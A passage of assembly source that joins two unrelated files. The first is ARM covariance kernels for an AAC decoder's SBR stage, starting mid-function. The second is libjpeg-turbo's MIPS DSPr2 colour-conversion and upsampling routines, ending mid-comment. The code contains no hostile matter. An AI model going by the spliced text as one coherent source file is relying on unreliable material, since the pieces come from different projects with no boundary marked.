mov r9, #0
mov r10, #0
mov r11, #0
mov r12, #0
mov r2, #(16*2 + 6) @ 38 loop iterations
CV1_Loop_Start:
mov r3, r5 @ shift sample n to sample n-1
ldr r5, [r0], #4*(1)
mov r4, r6
mov r14, #4*(2*64-1)
add r14, r0, r14 @ rebuild row-2 pointer after the increment
ldr r6, [r14]
rsb r14, r4, #0
smlal r7, r8, r5, r3
smlal r7, r8, r6, r4
smlal r9, r10, r3, r6
smlal r9, r10, r14, r5
smlal r11, r12, r3, r3
smlal r11, r12, r4, r4
subs r2, r2, #1
bne CV1_Loop_Start
stmia r1, {r7-r12} @ accBuf[0..5] = loop accumulators
@ final partial terms folded into the stashed first-sample products
ldr r0, [r1, #4*(6)]
ldr r2, [r1, #4*(7)]
rsb r3, r3, #0
adds r7, r0, r7
adc r8, r2, r8
smlal r7, r8, r5, r3
smlal r7, r8, r6, r14
ldr r0, [r1, #4*(8)]
ldr r2, [r1, #4*(9)]
adds r9, r0, r9
adc r10, r2, r10
smlal r9, r10, r3, r6
smlal r9, r10, r4, r5
ldr r0, [r1, #4*(10)]
ldr r2, [r1, #4*(11)]
adds r11, r0, r11
adc r12, r2, r12
rsb r0, r3, #0
smlal r11, r12, r3, r0
rsb r2, r4, #0
smlal r11, r12, r4, r2
add r1, r1, #(4*6)
stmia r1, {r7-r12} @ accBuf[6..11] = corrected totals
ldmfd sp!, {r4-r11, pc}
@ void CVKernel2(int *XBuf, int *accBuf)
@ see comments in sbrhfgen.c
.global raac_CVKernel2
@ raac_CVKernel2 -- covariance kernel for SBR high-frequency generation.
@ Accumulates two 64-bit sums of lag-2 products over 16*2+6 samples;
@ see sbrhfgen.c for the reference C code.
@ In:   r0 = XBuf (spectral samples), r1 = accBuf (4 x 32-bit output words)
@ NOTE(review): as in CVKernel1, the companion value is read 4*(2*64-1)
@ bytes ahead of the advanced XBuf pointer -- confirm the interleaved
@ 64-subband layout against sbrhfgen.c.
raac_CVKernel2:
	stmfd	sp!, {r4-r11, r14}	@ save callee-saved regs + lr
	mov	r7, #0			@ clear both 64-bit accumulators
	mov	r8, #0
	mov	r9, #0
	mov	r10, #0
	ldr	r3, [r0], #4*(1)	@ (r3,r4) = sample[n-2]
	mov	r14, #4*(2*64-1)
	add	r14, r0, r14
	ldr	r4, [r14]
	ldr	r5, [r0], #4*(1)	@ (r5,r6) = sample[n-1]
	ldr	r6, [r14]
	mov	r2, #(16*2 + 6)		@ loop counter
CV2_Loop_Start:
	ldr	r11, [r0], #4*(1)	@ (r11,r12) = sample[n]
	mov	r14, #4*(2*64-1)
	add	r14, r0, r14
	ldr	r12, [r14]
	rsb	r14, r4, #0		@ r14 = -r4
	smlal	r7, r8, r11, r3		@ acc0 += r11*r3 + r12*r4
	smlal	r7, r8, r12, r4
	smlal	r9, r10, r3, r12	@ acc1 += r3*r12 - r4*r11
	smlal	r9, r10, r14, r11
	mov	r3, r5			@ slide the 2-sample window forward
	mov	r4, r6
	mov	r5, r11
	mov	r6, r12
	subs	r2, r2, #1
	bne	CV2_Loop_Start
	stmia	r1, {r7-r10}		@ accBuf[0..3] = both accumulators
	ldmfd	sp!, {r4-r11, pc}	@ restore and return
.end
/*
* MIPS DSPr2 optimizations for libjpeg-turbo
*
* Copyright (C) 2013-2014, MIPS Technologies, Inc., California.
* All Rights Reserved.
* Authors: Teodora Novkovic <teodora.novkovic@imgtec.com>
* Darko Laus <darko.laus@imgtec.com>
* Copyright (C) 2015, D. R. Commander. All Rights Reserved.
*
* This software is provided 'as-is', without any express or implied
* warranty. In no event will the authors be held liable for any damages
* arising from the use of this software.
*
* Permission is granted to anyone to use this software for any purpose,
* including commercial applications, and to alter it and redistribute it
* freely, subject to the following restrictions:
*
* 1. The origin of this software must not be misrepresented; you must not
* claim that you wrote the original software. If you use this software
* in a product, an acknowledgment in the product documentation would be
* appreciated but is not required.
* 2. Altered source versions must be plainly marked as such, and must not be
* misrepresented as being the original software.
* 3. This notice may not be removed or altered from any source distribution.
*/
#include "jsimd_dspr2_asm.h"
/*****************************************************************************/
LEAF_DSPR2(jsimd_c_null_convert_dspr2)
/*
 * a0 = cinfo->image_width
 * a1 = input_buf
 * a2 = output_buf
 * a3 = output_row
 * 16(sp) = num_rows
 * 20(sp) = cinfo->num_components
 *
 * Null conversion for compression: de-interleaves each component of the
 * interleaved input rows into its own per-component output plane.
 *
 * NOTE: MIPS branch delay slots -- the instruction immediately following
 * every branch/jump below executes unconditionally before the branch takes
 * effect.  Loop 0..3 handles widths not divisible by 4 (residual bytes
 * first, then 4-at-a-time); loop 4..6 is the width%4 == 0 fast path.
 */
    SAVE_REGS_ON_STACK 8, s0, s1
    lw        t9, 24(sp)        /* t9 = num_rows */
    lw        s0, 28(sp)        /* s0 = cinfo->num_components */
    andi      t0, a0, 3         /* t0 = cinfo->image_width & 3 */
    beqz      t0, 4f            /* no residual */
    nop
0:
    addiu     t9, t9, -1
    bltz      t9, 7f
    li        t1, 0             /* t1 = ci (component index), in delay slot */
1:
    sll       t3, t1, 2
    lwx       t5, t3(a2)        /* t5 = outptr = output_buf[ci] */
    lw        t2, 0(a1)         /* t2 = inptr = *input_buf */
    sll       t4, a3, 2
    lwx       t5, t4(t5)        /* t5 = outptr = output_buf[ci][output_row] */
    addu      t2, t2, t1        /* inptr starts at component ci */
    addu      s1, t5, a0        /* s1 = end of output row */
    addu      t6, t5, t0        /* t6 = end of residual section */
2:
    /* copy the width%4 residual pixels one at a time */
    lbu       t3, 0(t2)
    addiu     t5, t5, 1
    sb        t3, -1(t5)
    bne       t6, t5, 2b
    addu      t2, t2, s0        /* inptr += num_components (delay slot) */
3:
    /* copy 4 pixels per iteration */
    lbu       t3, 0(t2)
    addu      t4, t2, s0
    addu      t7, t4, s0
    addu      t8, t7, s0
    addu      t2, t8, s0
    lbu       t4, 0(t4)
    lbu       t7, 0(t7)
    lbu       t8, 0(t8)
    addiu     t5, t5, 4
    sb        t3, -4(t5)
    sb        t4, -3(t5)
    sb        t7, -2(t5)
    bne       s1, t5, 3b
    sb        t8, -1(t5)        /* delay slot */
    addiu     t1, t1, 1
    bne       t1, s0, 1b        /* next component */
    nop
    addiu     a1, a1, 4         /* ++input_buf */
    bgez      t9, 0b
    addiu     a3, a3, 1         /* ++output_row (delay slot) */
    b         7f
    nop
4:
    /* fast path: image_width is a multiple of 4 */
    addiu     t9, t9, -1
    bltz      t9, 7f
    li        t1, 0             /* t1 = ci (delay slot) */
5:
    sll       t3, t1, 2
    lwx       t5, t3(a2)        /* t5 = outptr = output_buf[ci] */
    lw        t2, 0(a1)         /* t2 = inptr = *input_buf */
    sll       t4, a3, 2
    lwx       t5, t4(t5)        /* t5 = outptr = output_buf[ci][output_row] */
    addu      t2, t2, t1
    addu      s1, t5, a0
    addu      t6, t5, t0
6:
    lbu       t3, 0(t2)
    addu      t4, t2, s0
    addu      t7, t4, s0
    addu      t8, t7, s0
    addu      t2, t8, s0
    lbu       t4, 0(t4)
    lbu       t7, 0(t7)
    lbu       t8, 0(t8)
    addiu     t5, t5, 4
    sb        t3, -4(t5)
    sb        t4, -3(t5)
    sb        t7, -2(t5)
    bne       s1, t5, 6b
    sb        t8, -1(t5)        /* delay slot */
    addiu     t1, t1, 1
    bne       t1, s0, 5b
    nop
    addiu     a1, a1, 4
    bgez      t9, 4b
    addiu     a3, a3, 1         /* delay slot */
7:
    RESTORE_REGS_FROM_STACK 8, s0, s1
    j         ra
    nop
END(jsimd_c_null_convert_dspr2)
/*****************************************************************************/
/*
* jsimd_extrgb_ycc_convert_dspr2
* jsimd_extbgr_ycc_convert_dspr2
* jsimd_extrgbx_ycc_convert_dspr2
* jsimd_extbgrx_ycc_convert_dspr2
* jsimd_extxbgr_ycc_convert_dspr2
* jsimd_extxrgb_ycc_convert_dspr2
*
* Colorspace conversion RGB -> YCbCr
*/
/*
 * Generator macro: emits one RGB->YCbCr conversion routine per extended
 * pixel format.  \r_offs/\g_offs/\b_offs select the byte position of each
 * channel inside a \pixel_size-byte pixel.
 */
.macro GENERATE_JSIMD_RGB_YCC_CONVERT_DSPR2 colorid, pixel_size, \
                                            r_offs, g_offs, b_offs
/* Load one pixel's R, G, B bytes and advance the input pointer. */
.macro DO_RGB_TO_YCC r, g, b, inptr
    lbu       \r, \r_offs(\inptr)
    lbu       \g, \g_offs(\inptr)
    lbu       \b, \b_offs(\inptr)
    addiu     \inptr, \pixel_size
.endm
LEAF_DSPR2(jsimd_\colorid\()_ycc_convert_dspr2)
/*
 * a0 = cinfo->image_width
 * a1 = input_buf
 * a2 = output_buf
 * a3 = output_row
 * 16(sp) = num_rows
 *
 * Fixed-point Y/Cb/Cr terms are accumulated in the DSP accumulators
 * ac0/ac1/ac2 and rounded by extr.w ..., 16 (SCALEBITS = 16).
 * NOTE: the instruction after each branch executes in the delay slot.
 */
    SAVE_REGS_ON_STACK 32, s0, s1, s2, s3, s4, s5, s6, s7
    lw        t7, 48(sp)        /* t7 = num_rows */
    li        s0, 0x4c8b        /* FIX(0.29900) */
    li        s1, 0x9646        /* FIX(0.58700) */
    li        s2, 0x1d2f        /* FIX(0.11400) */
    li        s3, 0xffffd4cd    /* -FIX(0.16874) */
    li        s4, 0xffffab33    /* -FIX(0.33126) */
    li        s5, 0x8000        /* FIX(0.50000) */
    li        s6, 0xffff94d1    /* -FIX(0.41869) */
    li        s7, 0xffffeb2f    /* -FIX(0.08131) */
    li        t8, 0x807fff      /* CBCR_OFFSET + ONE_HALF-1 */
0:
    addiu     t7, -1            /* --num_rows */
    lw        t6, 0(a1)         /* t6 = input_buf[0] */
    lw        t0, 0(a2)
    lw        t1, 4(a2)
    lw        t2, 8(a2)
    sll       t3, a3, 2
    lwx       t0, t3(t0)        /* t0 = output_buf[0][output_row] = Y plane */
    lwx       t1, t3(t1)        /* t1 = output_buf[1][output_row] = Cb plane */
    lwx       t2, t3(t2)        /* t2 = output_buf[2][output_row] = Cr plane */
    addu      t9, t2, a0        /* t9 = end address */
    addiu     a3, 1
1:
    DO_RGB_TO_YCC t3, t4, t5, t6
    mtlo      s5, $ac0          /* ac0 = Y rounding constant */
    mtlo      t8, $ac1          /* ac1/ac2 = Cb/Cr offset + rounding */
    mtlo      t8, $ac2
    maddu     $ac0, s2, t5
    maddu     $ac1, s5, t5
    maddu     $ac2, s5, t3
    maddu     $ac0, s0, t3
    maddu     $ac1, s3, t3
    maddu     $ac2, s6, t4
    maddu     $ac0, s1, t4
    maddu     $ac1, s4, t4
    maddu     $ac2, s7, t5
    extr.w    t3, $ac0, 16      /* Y  = acc >> SCALEBITS */
    extr.w    t4, $ac1, 16      /* Cb */
    extr.w    t5, $ac2, 16      /* Cr */
    sb        t3, 0(t0)
    sb        t4, 0(t1)
    sb        t5, 0(t2)
    addiu     t0, 1
    addiu     t2, 1
    bne       t2, t9, 1b
    addiu     t1, 1             /* delay slot */
    bgtz      t7, 0b
    addiu     a1, 4             /* ++input_buf (delay slot) */
    RESTORE_REGS_FROM_STACK 32, s0, s1, s2, s3, s4, s5, s6, s7
    j         ra
    nop
END(jsimd_\colorid\()_ycc_convert_dspr2)
.purgem DO_RGB_TO_YCC
.endm
/*-------------------------------------id -- pix R  G  B */
GENERATE_JSIMD_RGB_YCC_CONVERT_DSPR2 extrgb,  3, 0, 1, 2
GENERATE_JSIMD_RGB_YCC_CONVERT_DSPR2 extbgr,  3, 2, 1, 0
GENERATE_JSIMD_RGB_YCC_CONVERT_DSPR2 extrgbx, 4, 0, 1, 2
GENERATE_JSIMD_RGB_YCC_CONVERT_DSPR2 extbgrx, 4, 2, 1, 0
GENERATE_JSIMD_RGB_YCC_CONVERT_DSPR2 extxbgr, 4, 3, 2, 1
GENERATE_JSIMD_RGB_YCC_CONVERT_DSPR2 extxrgb, 4, 1, 2, 3
/*****************************************************************************/
/*
* jsimd_ycc_extrgb_convert_dspr2
* jsimd_ycc_extbgr_convert_dspr2
* jsimd_ycc_extrgbx_convert_dspr2
* jsimd_ycc_extbgrx_convert_dspr2
* jsimd_ycc_extxbgr_convert_dspr2
* jsimd_ycc_extxrgb_convert_dspr2
*
* Colorspace conversion YCbCr -> RGB
*/
/*
 * Generator macro: emits one YCbCr->RGB conversion routine per extended
 * pixel format.  \a_offs is the alpha byte position; it is only written
 * (as 0xFF) when \pixel_size == 4.
 */
.macro GENERATE_JSIMD_YCC_RGB_CONVERT_DSPR2 colorid, pixel_size, \
                                            r_offs, g_offs, b_offs, a_offs
/* Store one pixel's channels at their format offsets and advance outptr. */
.macro STORE_YCC_TO_RGB scratch0 scratch1 scratch2 outptr
    sb        \scratch0, \r_offs(\outptr)
    sb        \scratch1, \g_offs(\outptr)
    sb        \scratch2, \b_offs(\outptr)
.if (\pixel_size == 4)
    li        t0, 0xFF          /* opaque alpha for 4-byte formats */
    sb        t0, \a_offs(\outptr)
.endif
    addiu     \outptr, \pixel_size
.endm
LEAF_DSPR2(jsimd_ycc_\colorid\()_convert_dspr2)
/*
 * a0 = cinfo->image_width
 * a1 = input_buf
 * a2 = input_row
 * a3 = output_buf
 * 16(sp) = num_rows
 *
 * R and G are computed packed in t2 (saturated with shll_s.ph/shra.ph),
 * B separately in t0 (saturated with shll_s.w/sra); both paths center the
 * value around 0, saturate, then re-add 128.
 * NOTE: the instruction after each branch executes in the delay slot.
 */
    SAVE_REGS_ON_STACK 32, s0, s1, s2, s3, s4, s5, s6, s7
    lw        s1, 48(sp)        /* s1 = num_rows */
    li        t3, 0x8000        /* ONE_HALF for the G rounding term */
    li        t4, 0x166e9       /* FIX(1.40200) */
    li        t5, 0x1c5a2       /* FIX(1.77200) */
    li        t6, 0xffff492e    /* -FIX(0.71414) */
    li        t7, 0xffffa7e6    /* -FIX(0.34414) */
    repl.ph   t8, 128           /* t8 = 128|128 for packed recentering */
0:
    lw        s0, 0(a3)         /* s0 = outptr */
    lw        t0, 0(a1)
    lw        t1, 4(a1)
    lw        t2, 8(a1)
    sll       s5, a2, 2
    addiu     s1, -1
    lwx       s2, s5(t0)        /* s2 = inptr0 (Y) */
    lwx       s3, s5(t1)        /* s3 = inptr1 (Cb) */
    lwx       s4, s5(t2)        /* s4 = inptr2 (Cr) */
    addu      t9, s2, a0        /* t9 = end of Y row */
    addiu     a2, 1
1:
    lbu       s7, 0(s4)         /* cr */
    lbu       s6, 0(s3)         /* cb */
    lbu       s5, 0(s2)         /* y */
    addiu     s2, 1
    addiu     s4, 1
    addiu     s7, -128
    addiu     s6, -128
    mul       t2, t7, s6
    mul       t0, t6, s7        /* Crgtab[cr] */
    sll       s7, 15
    mulq_rs.w t1, t4, s7        /* Crrtab[cr] */
    sll       s6, 15
    addu      t2, t3            /* Cbgtab[cb] */
    addu      t2, t0
    mulq_rs.w t0, t5, s6        /* Cbbtab[cb] */
    sra       t2, 16
    addu      t1, s5
    addu      t2, s5            /* add y */
    ins       t2, t1, 16, 16    /* t2 = R|G packed halfwords */
    subu.ph   t2, t2, t8
    addu      t0, s5
    shll_s.ph t2, t2, 8         /* saturate R and G to [-128,127] */
    subu      t0, 128
    shra.ph   t2, t2, 8
    shll_s.w  t0, t0, 24        /* saturate B */
    addu.ph   t2, t2, t8        /* clip & store */
    sra       t0, t0, 24
    sra       t1, t2, 16
    addiu     t0, 128
    STORE_YCC_TO_RGB t1, t2, t0, s0
    bne       s2, t9, 1b
    addiu     s3, 1             /* ++Cb ptr (delay slot) */
    bgtz      s1, 0b
    addiu     a3, 4             /* ++output_buf (delay slot) */
    RESTORE_REGS_FROM_STACK 32, s0, s1, s2, s3, s4, s5, s6, s7
    j         ra
    nop
END(jsimd_ycc_\colorid\()_convert_dspr2)
.purgem STORE_YCC_TO_RGB
.endm
/*-------------------------------------id -- pix R  G  B  A */
GENERATE_JSIMD_YCC_RGB_CONVERT_DSPR2 extrgb,  3, 0, 1, 2, 3
GENERATE_JSIMD_YCC_RGB_CONVERT_DSPR2 extbgr,  3, 2, 1, 0, 3
GENERATE_JSIMD_YCC_RGB_CONVERT_DSPR2 extrgbx, 4, 0, 1, 2, 3
GENERATE_JSIMD_YCC_RGB_CONVERT_DSPR2 extbgrx, 4, 2, 1, 0, 3
GENERATE_JSIMD_YCC_RGB_CONVERT_DSPR2 extxbgr, 4, 3, 2, 1, 0
GENERATE_JSIMD_YCC_RGB_CONVERT_DSPR2 extxrgb, 4, 1, 2, 3, 0
/*****************************************************************************/
/*
* jsimd_extrgb_gray_convert_dspr2
* jsimd_extbgr_gray_convert_dspr2
* jsimd_extrgbx_gray_convert_dspr2
* jsimd_extbgrx_gray_convert_dspr2
* jsimd_extxbgr_gray_convert_dspr2
* jsimd_extxrgb_gray_convert_dspr2
*
* Colorspace conversion RGB -> GRAY
*/
/*
 * Generator macro: emits one RGB->grayscale conversion routine per
 * extended pixel format.  The main loop computes 4 output pixels per
 * iteration by ping-ponging between accumulators ac0 and ac1; the
 * residual loop (label 3) handles image_width % 4 leftover pixels.
 */
.macro GENERATE_JSIMD_RGB_GRAY_CONVERT_DSPR2 colorid, pixel_size, \
                                             r_offs, g_offs, b_offs
/* Load one pixel's R, G, B bytes and advance the input pointer. */
.macro DO_RGB_TO_GRAY r, g, b, inptr
    lbu       \r, \r_offs(\inptr)
    lbu       \g, \g_offs(\inptr)
    lbu       \b, \b_offs(\inptr)
    addiu     \inptr, \pixel_size
.endm
LEAF_DSPR2(jsimd_\colorid\()_gray_convert_dspr2)
/*
 * a0 = cinfo->image_width
 * a1 = input_buf
 * a2 = output_buf
 * a3 = output_row
 * 16(sp) = num_rows
 *
 * NOTE: the instruction after each branch executes in the delay slot.
 */
    SAVE_REGS_ON_STACK 32, s0, s1, s2, s3, s4, s5, s6, s7
    li        s0, 0x4c8b        /* s0 = FIX(0.29900) */
    li        s1, 0x9646        /* s1 = FIX(0.58700) */
    li        s2, 0x1d2f        /* s2 = FIX(0.11400) */
    li        s7, 0x8000        /* s7 = FIX(0.50000) */
    lw        s6, 48(sp)
    andi      t7, a0, 3         /* t7 = image_width % 4 (residual count) */
0:
    addiu     s6, -1            /* s6 = num_rows */
    lw        t0, 0(a1)
    lw        t1, 0(a2)
    sll       t3, a3, 2
    lwx       t1, t3(t1)        /* t1 = outptr = output_buf[0][output_row] */
    addiu     a3, 1
    addu      t9, t1, a0        /* t9 = end of output row */
    subu      t8, t9, t7        /* t8 = end of 4-aligned section */
    beq       t1, t8, 2f        /* width < 4: residual only */
    nop
1:
    /* 4 pixels per iteration, alternating ac0/ac1 to hide latency */
    DO_RGB_TO_GRAY t3, t4, t5, t0
    DO_RGB_TO_GRAY s3, s4, s5, t0
    mtlo      s7, $ac0
    maddu     $ac0, s2, t5
    maddu     $ac0, s1, t4
    maddu     $ac0, s0, t3
    mtlo      s7, $ac1
    maddu     $ac1, s2, s5
    maddu     $ac1, s1, s4
    maddu     $ac1, s0, s3
    extr.w    t6, $ac0, 16
    DO_RGB_TO_GRAY t3, t4, t5, t0
    DO_RGB_TO_GRAY s3, s4, s5, t0
    mtlo      s7, $ac0
    maddu     $ac0, s2, t5
    maddu     $ac0, s1, t4
    extr.w    t2, $ac1, 16
    maddu     $ac0, s0, t3
    mtlo      s7, $ac1
    maddu     $ac1, s2, s5
    maddu     $ac1, s1, s4
    maddu     $ac1, s0, s3
    extr.w    t5, $ac0, 16
    sb        t6, 0(t1)
    sb        t2, 1(t1)
    extr.w    t3, $ac1, 16
    addiu     t1, 4
    sb        t5, -2(t1)
    sb        t3, -1(t1)
    bne       t1, t8, 1b
    nop
2:
    beqz      t7, 4f            /* no residual pixels */
    nop
3:
    /* one residual pixel per iteration */
    DO_RGB_TO_GRAY t3, t4, t5, t0
    mtlo      s7, $ac0
    maddu     $ac0, s2, t5
    maddu     $ac0, s1, t4
    maddu     $ac0, s0, t3
    extr.w    t6, $ac0, 16
    sb        t6, 0(t1)
    addiu     t1, 1
    bne       t1, t9, 3b
    nop
4:
    bgtz      s6, 0b
    addiu     a1, 4             /* ++input_buf (delay slot) */
    RESTORE_REGS_FROM_STACK 32, s0, s1, s2, s3, s4, s5, s6, s7
    j         ra
    nop
END(jsimd_\colorid\()_gray_convert_dspr2)
.purgem DO_RGB_TO_GRAY
.endm
/*-------------------------------------id -- pix R  G  B */
GENERATE_JSIMD_RGB_GRAY_CONVERT_DSPR2 extrgb,  3, 0, 1, 2
GENERATE_JSIMD_RGB_GRAY_CONVERT_DSPR2 extbgr,  3, 2, 1, 0
GENERATE_JSIMD_RGB_GRAY_CONVERT_DSPR2 extrgbx, 4, 0, 1, 2
GENERATE_JSIMD_RGB_GRAY_CONVERT_DSPR2 extbgrx, 4, 2, 1, 0
GENERATE_JSIMD_RGB_GRAY_CONVERT_DSPR2 extxbgr, 4, 3, 2, 1
GENERATE_JSIMD_RGB_GRAY_CONVERT_DSPR2 extxrgb, 4, 1, 2, 3
/*****************************************************************************/
/*
* jsimd_h2v2_merged_upsample_dspr2
* jsimd_h2v2_extrgb_merged_upsample_dspr2
* jsimd_h2v2_extrgbx_merged_upsample_dspr2
* jsimd_h2v2_extbgr_merged_upsample_dspr2
* jsimd_h2v2_extbgrx_merged_upsample_dspr2
* jsimd_h2v2_extxbgr_merged_upsample_dspr2
* jsimd_h2v2_extxrgb_merged_upsample_dspr2
*
* Merged h2v2 upsample routines
*/
/*
 * Generator macro: emits one h2v2 merged-upsample routine per extended
 * pixel format.  Each chroma sample is shared by a 2x2 block of Y samples,
 * so one iteration of the main loop emits two pixels on each of two output
 * rows.  Offsets are relative to a two-pixel (2 * pixel_size byte) group.
 */
.macro GENERATE_H2V2_MERGED_UPSAMPLE_DSPR2 colorid, pixel_size, \
                                           r1_offs, g1_offs, \
                                           b1_offs, a1_offs, \
                                           r2_offs, g2_offs, \
                                           b2_offs, a2_offs
/* Store two adjacent pixels and advance outptr by one 2-pixel group. */
.macro STORE_H2V2_2_PIXELS scratch0 scratch1 scratch2 scratch3 scratch4 \
                           scratch5 outptr
    sb        \scratch0, \r1_offs(\outptr)
    sb        \scratch1, \g1_offs(\outptr)
    sb        \scratch2, \b1_offs(\outptr)
    sb        \scratch3, \r2_offs(\outptr)
    sb        \scratch4, \g2_offs(\outptr)
    sb        \scratch5, \b2_offs(\outptr)
.if (\pixel_size == 8)
    li        \scratch0, 0xFF   /* opaque alpha for 4-byte-per-pixel formats */
    sb        \scratch0, \a1_offs(\outptr)
    sb        \scratch0, \a2_offs(\outptr)
.endif
    addiu     \outptr, \pixel_size
.endm
/* Store a single trailing pixel (odd output_width); outptr not advanced. */
.macro STORE_H2V2_1_PIXEL scratch0 scratch1 scratch2 outptr
    sb        \scratch0, \r1_offs(\outptr)
    sb        \scratch1, \g1_offs(\outptr)
    sb        \scratch2, \b1_offs(\outptr)
.if (\pixel_size == 8)
    li        t0, 0xFF
    sb        t0, \a1_offs(\outptr)
.endif
.endm
LEAF_DSPR2(jsimd_h2v2_\colorid\()_merged_upsample_dspr2)
/*
 * a0 = cinfo->output_width
 * a1 = input_buf
 * a2 = in_row_group_ctr
 * a3 = output_buf
 * 16(sp) = cinfo->sample_range_limit
 *
 * t9 points at the range-limit table, so "addu reg, t9, val; lbu" below is
 * a clamped table lookup.  The FIX() constants are synthesized with addiu
 * chains instead of li to reuse registers.
 * NOTE: the instruction after each branch executes in the delay slot.
 */
    SAVE_REGS_ON_STACK 40, s0, s1, s2, s3, s4, s5, s6, s7, ra
    lw        t9, 56(sp)        /* cinfo->sample_range_limit */
    lw        v0, 0(a1)
    lw        v1, 4(a1)
    lw        t0, 8(a1)
    sll       t1, a2, 3
    addiu     t2, t1, 4
    sll       t3, a2, 2
    lw        t4, 0(a3)         /* t4 = output_buf[0] */
    lwx       t1, t1(v0)        /* t1 = input_buf[0][in_row_group_ctr*2] */
    lwx       t2, t2(v0)        /* t2 = input_buf[0][in_row_group_ctr*2 + 1] */
    lwx       t5, t3(v1)        /* t5 = input_buf[1][in_row_group_ctr] */
    lwx       t6, t3(t0)        /* t6 = input_buf[2][in_row_group_ctr] */
    lw        t7, 4(a3)         /* t7 = output_buf[1] */
    li        s1, 0xe6ea
    addiu     t8, s1, 0x7fff    /* t8 = 0x166e9 [FIX(1.40200)] */
    addiu     s0, t8, 0x5eb9    /* s0 = 0x1c5a2 [FIX(1.77200)] */
    addiu     s1, zero, 0xa7e6  /* s1 = 0xffffa7e6 [-FIX(0.34414)] */
    xori      s2, s1, 0xeec8    /* s2 = 0xffff492e [-FIX(0.71414)] */
    srl       t3, a0, 1
    blez      t3, 2f            /* output_width < 2: single column only */
    addu      t0, t5, t3        /* t0 = end address (delay slot) */
1:
    lbu       t3, 0(t5)
    lbu       s3, 0(t6)
    addiu     t5, t5, 1
    addiu     t3, t3, -128      /* (cb - 128) */
    addiu     s3, s3, -128      /* (cr - 128) */
    mult      $ac1, s1, t3
    madd      $ac1, s2, s3
    sll       s3, s3, 15
    sll       t3, t3, 15
    mulq_rs.w s4, t8, s3        /* s4 = (C1 * cr + ONE_HALF)>> SCALEBITS */
    extr_r.w  s5, $ac1, 16      /* s5 = green chroma term */
    mulq_rs.w s6, s0, t3        /* s6 = (C2 * cb + ONE_HALF)>> SCALEBITS */
    lbu       v0, 0(t1)         /* y, row 0, even column */
    addiu     t6, t6, 1
    addiu     t1, t1, 2
    addu      t3, v0, s4        /* y+cred */
    addu      s3, v0, s5        /* y+cgreen */
    addu      v1, v0, s6        /* y+cblue */
    addu      t3, t9, t3        /* y+cred */
    addu      s3, t9, s3        /* y+cgreen */
    addu      v1, t9, v1        /* y+cblue */
    lbu       AT, 0(t3)         /* range-limit lookups */
    lbu       s7, 0(s3)
    lbu       ra, 0(v1)
    lbu       v0, -1(t1)        /* y, row 0, odd column */
    addu      t3, v0, s4        /* y+cred */
    addu      s3, v0, s5        /* y+cgreen */
    addu      v1, v0, s6        /* y+cblue */
    addu      t3, t9, t3        /* y+cred */
    addu      s3, t9, s3        /* y+cgreen */
    addu      v1, t9, v1        /* y+cblue */
    lbu       t3, 0(t3)
    lbu       s3, 0(s3)
    lbu       v1, 0(v1)
    lbu       v0, 0(t2)         /* y, row 1, even column */
    STORE_H2V2_2_PIXELS AT, s7, ra, t3, s3, v1, t4
    addu      t3, v0, s4        /* y+cred */
    addu      s3, v0, s5        /* y+cgreen */
    addu      v1, v0, s6        /* y+cblue */
    addu      t3, t9, t3        /* y+cred */
    addu      s3, t9, s3        /* y+cgreen */
    addu      v1, t9, v1        /* y+cblue */
    lbu       AT, 0(t3)
    lbu       s7, 0(s3)
    lbu       ra, 0(v1)
    lbu       v0, 1(t2)         /* y, row 1, odd column */
    addiu     t2, t2, 2
    addu      t3, v0, s4        /* y+cred */
    addu      s3, v0, s5        /* y+cgreen */
    addu      v1, v0, s6        /* y+cblue */
    addu      t3, t9, t3        /* y+cred */
    addu      s3, t9, s3        /* y+cgreen */
    addu      v1, t9, v1        /* y+cblue */
    lbu       t3, 0(t3)
    lbu       s3, 0(s3)
    lbu       v1, 0(v1)
    STORE_H2V2_2_PIXELS AT, s7, ra, t3, s3, v1, t7
    bne       t0, t5, 1b
    nop
2:
    /* odd output_width: one trailing column, one pixel per output row */
    andi      t0, a0, 1
    beqz      t0, 4f
    lbu       t3, 0(t5)         /* delay slot (harmless load if not taken) */
    lbu       s3, 0(t6)
    addiu     t3, t3, -128      /* (cb - 128) */
    addiu     s3, s3, -128      /* (cr - 128) */
    mult      $ac1, s1, t3
    madd      $ac1, s2, s3
    sll       s3, s3, 15
    sll       t3, t3, 15
    lbu       v0, 0(t1)
    extr_r.w  s5, $ac1, 16
    mulq_rs.w s4, t8, s3        /* s4 = (C1 * cr + ONE_HALF)>> SCALEBITS */
    mulq_rs.w s6, s0, t3        /* s6 = (C2 * cb + ONE_HALF)>> SCALEBITS */
    addu      t3, v0, s4        /* y+cred */
    addu      s3, v0, s5        /* y+cgreen */
    addu      v1, v0, s6        /* y+cblue */
    addu      t3, t9, t3        /* y+cred */
    addu      s3, t9, s3        /* y+cgreen */
    addu      v1, t9, v1        /* y+cblue */
    lbu       t3, 0(t3)
    lbu       s3, 0(s3)
    lbu       v1, 0(v1)
    lbu       v0, 0(t2)
    STORE_H2V2_1_PIXEL t3, s3, v1, t4
    addu      t3, v0, s4        /* y+cred */
    addu      s3, v0, s5        /* y+cgreen */
    addu      v1, v0, s6        /* y+cblue */
    addu      t3, t9, t3        /* y+cred */
    addu      s3, t9, s3        /* y+cgreen */
    addu      v1, t9, v1        /* y+cblue */
    lbu       t3, 0(t3)
    lbu       s3, 0(s3)
    lbu       v1, 0(v1)
    STORE_H2V2_1_PIXEL t3, s3, v1, t7
4:
    RESTORE_REGS_FROM_STACK 40, s0, s1, s2, s3, s4, s5, s6, s7, ra
    j         ra
    nop
END(jsimd_h2v2_\colorid\()_merged_upsample_dspr2)
.purgem STORE_H2V2_1_PIXEL
.purgem STORE_H2V2_2_PIXELS
.endm
/*------------------------------------id -- pix R1 G1 B1 A1 R2 G2 B2 A2 */
GENERATE_H2V2_MERGED_UPSAMPLE_DSPR2 extrgb,  6, 0, 1, 2, 6, 3, 4, 5, 6
GENERATE_H2V2_MERGED_UPSAMPLE_DSPR2 extbgr,  6, 2, 1, 0, 3, 5, 4, 3, 6
GENERATE_H2V2_MERGED_UPSAMPLE_DSPR2 extrgbx, 8, 0, 1, 2, 3, 4, 5, 6, 7
GENERATE_H2V2_MERGED_UPSAMPLE_DSPR2 extbgrx, 8, 2, 1, 0, 3, 6, 5, 4, 7
GENERATE_H2V2_MERGED_UPSAMPLE_DSPR2 extxbgr, 8, 3, 2, 1, 0, 7, 6, 5, 4
GENERATE_H2V2_MERGED_UPSAMPLE_DSPR2 extxrgb, 8, 1, 2, 3, 0, 5, 6, 7, 4
/*****************************************************************************/
/*
* jsimd_h2v1_merged_upsample_dspr2
